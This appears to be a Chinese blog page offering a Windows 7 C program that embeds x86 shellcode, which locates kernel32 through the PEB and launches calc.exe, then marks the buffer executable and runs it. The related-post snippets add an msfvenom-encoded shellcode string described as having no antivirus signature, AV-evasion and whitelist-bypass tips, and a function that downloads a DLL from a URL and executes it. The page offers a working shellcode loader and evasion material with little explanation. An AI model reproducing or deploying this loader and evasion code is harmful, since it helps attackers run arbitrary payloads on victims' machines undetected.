WIN7下可执行的ShellCode

最新推荐文章于 2022-05-27 18:12:39 发布
最新推荐文章于 2022-05-27 18:12:39 发布
阅读量4.2k 收藏 1
点赞数
分类专栏: 其他 
#include <windows.h>
#include <stdio.h>
int main()
{
	byte shellcode[] = {
		0xE9, 0x96, 0x00, 0x00, 0x00, 0x56, 0x31, 0xC9, 0x64, 0x8B, 0x71, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 
		0x76, 0x1C, 0x8B, 0x46, 0x08, 0x8B, 0x7E, 0x20, 0x8B, 0x36, 0x66, 0x39, 0x4F, 0x18, 0x75, 0xF2, 
		0x5E, 0xC3, 0x60, 0x8B, 0x6C, 0x24, 0x24, 0x8B, 0x45, 0x3C, 0x8B, 0x54, 0x05, 0x78, 0x01, 0xEA, 
		0x8B, 0x4A, 0x18, 0x8B, 0x5A, 0x20, 0x01, 0xEB, 0xE3, 0x37, 0x49, 0x8B, 0x34, 0x8B, 0x01, 0xEE, 
		0x31, 0xFF, 0x31, 0xC0, 0xFC, 0xAC, 0x84, 0xC0, 0x74, 0x0A, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE9, 
		0xF1, 0xFF, 0xFF, 0xFF, 0x3B, 0x7C, 0x24, 0x28, 0x75, 0xDE, 0x8B, 0x5A, 0x24, 0x01, 0xEB, 0x66, 
		0x8B, 0x0C, 0x4B, 0x8B, 0x5A, 0x1C, 0x01, 0xEB, 0x8B, 0x04, 0x8B, 0x01, 0xE8, 0x89, 0x44, 0x24, 
		0x1C, 0x61, 0xC3, 0xAD, 0x50, 0x52, 0xE8, 0xA7, 0xFF, 0xFF, 0xFF, 0x89, 0x07, 0x81, 0xC4, 0x08, 
		0x00, 0x00, 0x00, 0x81, 0xC7, 0x04, 0x00, 0x00, 0x00, 0x39, 0xCE, 0x75, 0xE6, 0xC3, 0xE8, 0x19, 
		0x00, 0x00, 0x00, 0x98, 0xFE, 0x8A, 0x0E, 0x7E, 0xD8, 0xE2, 0x73, 0x81, 0xEC, 0x08, 0x00, 0x00, 
		0x00, 0x89, 0xE5, 0xE8, 0x5D, 0xFF, 0xFF, 0xFF, 0x89, 0xC2, 0xEB, 0xE2, 0x5E, 0x8D, 0x7D, 0x04, 
		0x89, 0xF1, 0x81, 0xC1, 0x08, 0x00, 0x00, 0x00, 0xE8, 0xB6, 0xFF, 0xFF, 0xFF, 0xEB, 0x0E, 0x5B, 
		0x31, 0xC0, 0x50, 0x53, 0xFF, 0x55, 0x04, 0x31, 0xC0, 0x50, 0xFF, 0x55, 0x08, 0xE8, 0xED, 0xFF, 
		0xFF, 0xFF, 0x63, 0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00
	};
	printf("size of shellcode: %d/n", sizeof(shellcode));
	system("pause");
	byte *bCall=shellcode;
	DWORD dwOld=0;
	VirtualProtect(bCall,sizeof(bCall),PAGE_EXECUTE_READWRITE,&dwOld);
	typedef void (WINAPI *pGGCall)();
	pGGCall pss=(pGGCall)&shellcode[0];
	pss();
	return 0;
}

小神兵
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Win 7下定位kernel32.dll基址及shellcode编写1
08-03
利用 PEB 结构来查找 kernel32.dll 的原理:FS 段寄存器作为选择子指向当前的 TEB 结构,在位于 PEB_LDR_DATA 结构偏移 0x1
Shellcode-Extractor:Python脚本从Linux可执行文件中提取Shellcode
05-18
ShellcodeExtractor SHELLCODE-EXTRACTOR工具,用于从对象/二进制文件中提取shellcode和长度。 版权所有(C)2017 Neetx 该文件是Shellcode-Extractor的一部分。 Shellcode-Extractor是免费软件:您可以根据自由软件基金会发布的GNU通用公共许可证的条款(许可证的版本3)或(可选)任何更高版本来重新分发和/或修改它。 发行Shellcode-Extractor的目的是希望它会有用,但没有任何担保; 甚至没有对适销性或特定用途适用性的暗示保证。 有关更多详细信息,请参见GNU通用公共许可证。 您应该已经与该程序一起收到了GNU通用公共许可证的副本。 如果没有,请参阅 联系方式: 由于研究和研究原因而开发的工具,希望它会有用。 用法 编写汇编代码,生成目标文件,并在管道中使用此脚本到objdump
shellcode 执行
01-04
//msfvenom -p windows/exec CMD=calc.exe -f exe -e x86/shikata_ga_nai -i 6 -f c 生成shellcod 测试数据: bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 将shellcode作为参数传入执行盒,./shllcode_Argv.exe bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 即可执行该段shellcode。 该exe可传vt查看报毒情况,无特征码
WinXP/Win7/Win8通用shellcode
SauceJ的专栏
09-17 1314
转自http://hi.baidu.com/egodcore/item/c13e67fe197c940fc6dc45f5 众所周知,在windows xp时代未启用ASLR(Address space layout randomization,堆栈地址随机分布),我们在编写shellcode可以利用硬编码法,将地址写入shellcode,但是这种方法的缺点很明显--不具备通用性。在xp sp
利用白名单绕过限制的更多测试
weixin_34176694的博客
03-08 744
三好学生 · 2015/10/08 10:100x00 前言subTee在博客中不仅介绍了如何利用InstallUtil.exe直接执行pe文件,还提到了另一种利用方式——利用InstallUtil执行shellcode 从subTee分享的代码可以看出其测试环境为64位、.net4.0环境,在360安全播报上发表的文章也认为执行环境必须是.net4.0以上,适用范围很窄 但我并不这么认为下面我们...
shellcode样本—弹出计算器
谈成(C/C++)
04-28 1697
该样本弹出计算器的原理为: 1)先加载MSVCRT.DLL。 2)再使用system()函数调用calc命令。 该shellcode脚本只在xp下通过实验,仅适合用来研究和验证漏洞。其中的函数地址采用的都是固定地址。win7以上不适用。 该样本特点:没有任何0x00,可以参与字符串类溢出。比如strcpy等。 unsigned char shellcode2[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
shellcode2--弹出计算器
gclome的博客
02-18 2071
// 345.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include "stdio.h" #include "windows.h" char shellcode[]="\x66\x81\xEC\x54\x04\x33\xDB\x53\x68\x2E\x65\x78\x65\...
shellcode——1、采用硬编码弹出计算器
alwin_cx的博客
05-19 6257
一、shellcode介绍    用一句话给shellcode下个定义,那就是“一段可以执行特定功能的机器码”。二、实验环境及工具介绍实验环境:Windows XP SP3实验工具:OllyDbg、WinHex、LordPE三、编程思路     用C语言来描述其实就是两句:WinExec("calc.exe", 5); ExitProcess(0);     看到有些文章会在开头还加一句:Load...
win7下测试shellcode的方法1:关闭DEP
02-22 177
win7下,通过下面的方法测试shellcode: char shellcode [] ="..." ; int main ( int argc , char ** argv) { __asm { lea eax , shellcode call eax } ...
通用ShellCode学习笔记——win7中获得LoadLibraryA地址
weixin_30548917的博客
09-19 384
一、ShellCode的编写 Kernel32地址的获取 由于win7的_PEB_LDR_DATA表和以前的系统有了改变,直接查询0x08方式在win7下失效,为了保证shellcode的通用性(主要是增加对win7的支持),采用遍历查询的方式定位kernel32的位置 esi=fs:0->TEB esi=TEB:30h->PEB esi=PEB:0ch->_P...
ShellCodeUtil_Test bin
06-16
/***************************************************************** 文件名 : ShellCodeMainTest.hpp 描述 : 作者 : liqi09 最后修改日期 : 2015-05-13 16:17 修改人 : 最后修改日期 : 修改描述 : Copyright (C) All Rights Reserved *****************************************************************/ #ifndef __SHELLCODEMAINTEST_HPP__ #define __SHELLCODEMAINTEST_HPP__ #include "Extend/ShellCodeApiDefine.h" #include "Extend/asyc.h" void FunctionTest() { char szBuffer[20]; strcpy(szBuffer, S("CopyBuffer")); Trace(szBuffer); Trace(S("%s"), S("Trace init ok!")); Trace(S("wsprintfA EatAddr:%p ProcAddr:%p"), EatAddr("user32", "wsprintfA"), ProcAddr("user32", "wsprintfA")); MsvcrtCall(printf, S("%s"), S("printf init ok!\n")); MsvcrtCall(printf, S("cmdline:%s\n"), Fun("kernel32", GetCommandLineA)()); Kernel32Call(WinExec, S("notepad.exe"), SW_SHOW); MsvcrtCall(system, S("pause")); } class CClassTest { public: CClassTest(){ Trace(S("CTest")); } ~CClassTest(){ Trace(S("~CTest")); } void Function1(){ Trace(S("Function1")); } }; BOOL LoadUrlDll(PCHAR url, PCHAR proc) { char szFile[MAX_PATH]; BOOL bOk = FALSE; HRESULT hRes = URLDownloadToCacheFileA(NULL, url, (LPTSTR)szFile, MAX_PATH, NULL, NULL); if (hRes == S_OK) { Trace(S("download ok! %s"), szFile); HMODULE hModule = LoadLibraryA(szFile); if (hModule) { FARPROC Entry = GetProcAddress(hModule, proc); if (Entry) { Entry(); bOk = TRUE; } FreeLibrary(hModule); } } return bOk; } BOOL LoadUrlDllAsyc(PCHAR url, PCHAR proc) { char szFile[MAX_PATH]; BOOL bOk = FALSE; HRESULT hRes = URLDownloadToCacheFileA(NULL, url, (LPTSTR)szFile, MAX_PATH, NULL, NULL); if (hRes == S_OK) { Trace(S("download ok! %s"), szFile); HMODULE hModule = AsycLoadLibrary(szFile, TRUE, NULL); if (hModule) { FARPROC Entry = AsycGetProcAddress(hModule, proc); if (Entry) { Entry(); bOk = TRUE; } AsycFreeLibrary(hModule, TRUE); } } return bOk; } void ShellCodeMain() { CClassTest t; t.Function1(); FunctionTest(); //下载dll并内存加载,太过邪恶,先注掉。。 //LoadUrlDllAsyc(S("http://xxx.com.cn/test/TestDll.dll"), S("Entry")); } #endif // __SHELLCODEMAINTEST_HPP__
Win32 Shellcode.7z
05-20
Win32 Shellcode.7z Win32 Shellcode.7z
win32shellcode
06-26
win32shellcode
栈溢出攻击之弹出计算器
Bonjour~
04-15 7609
一.系统栈溢出原理函数栈帧及寄存器在高级语言中,当函数被调用时,系统栈会为这个函数开辟一个新的栈帧,并把它压入栈中。这个栈帧中的内存空间被它所属的函数独占,正常情况下是不会和别的函数共享的。当函数返回时,系统栈会弹出该函数所对应的栈帧。Win32系统提供两个特殊的寄存器用于标识位于系统栈顶端的栈帧: 1. ESP:栈指针寄存器,其内存放着一个指针,该指针永远指向系统栈最上面一个栈帧的栈顶; 2.
WinDBG遍历_LIST_ENTRY链表
10-19 1093
因为Window不同版本的内核数据结构有所不同,先声明实验环境。本实验在window7 32位系统下并且运行运算器(calc.exe)测试。为了显示的信息不至于冗长,在开始实验前先讲讲dt命令的-y参数及ExpTimerResolutionListHead全局变量。 1、dt命令查看_EPROCESS结构及-y参数 lkd> dt nt!_EPROCESS +0x0...
演示几种用c语言来执行shellcode(其实也就是机器码)的方式,shellcode(示例代码)
weixin_36200896的博客
05-24 810
简介这篇文章主要介绍了shellcode(示例代码)以及相关的经验技巧,文章约1446字,浏览量241,点赞数8,值得推荐!/** 作者: 冷却* 时间: 2009年2月21日* E-mail: [email protected]* 描述: 演示几种用C语言来执行shellcode(其实也就是机器码)的方式* 备注:在WindowsXP SP3下测试成功*///一段打开Windo...
msf shellcode分离免杀技术
yy
05-27 1874
一般的shellcode是直接放在程序里面执行,分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火绒和360 msf免杀 shellcode分离免杀
win7下模拟溢出漏洞利用shellcode弹出计算器
天空下得大海
10-07 3308
win7 溢出漏洞 shellcode 弹出计算器
Rain Water Algorithm雨水优化算法附matlab代码.zip
最新发布
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
调用enumdisplaymonitors执行shellcode
10-05
将调用EnumDisplayMonitors和执行Shellcode结合在一起,可以实现一些特定的功能或攻击。 一种可能的应用场景是,在恶意软件中使用调用EnumDisplayMonitors执行Shellcode的方法,以实现屏幕监控或远程控制的功能。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值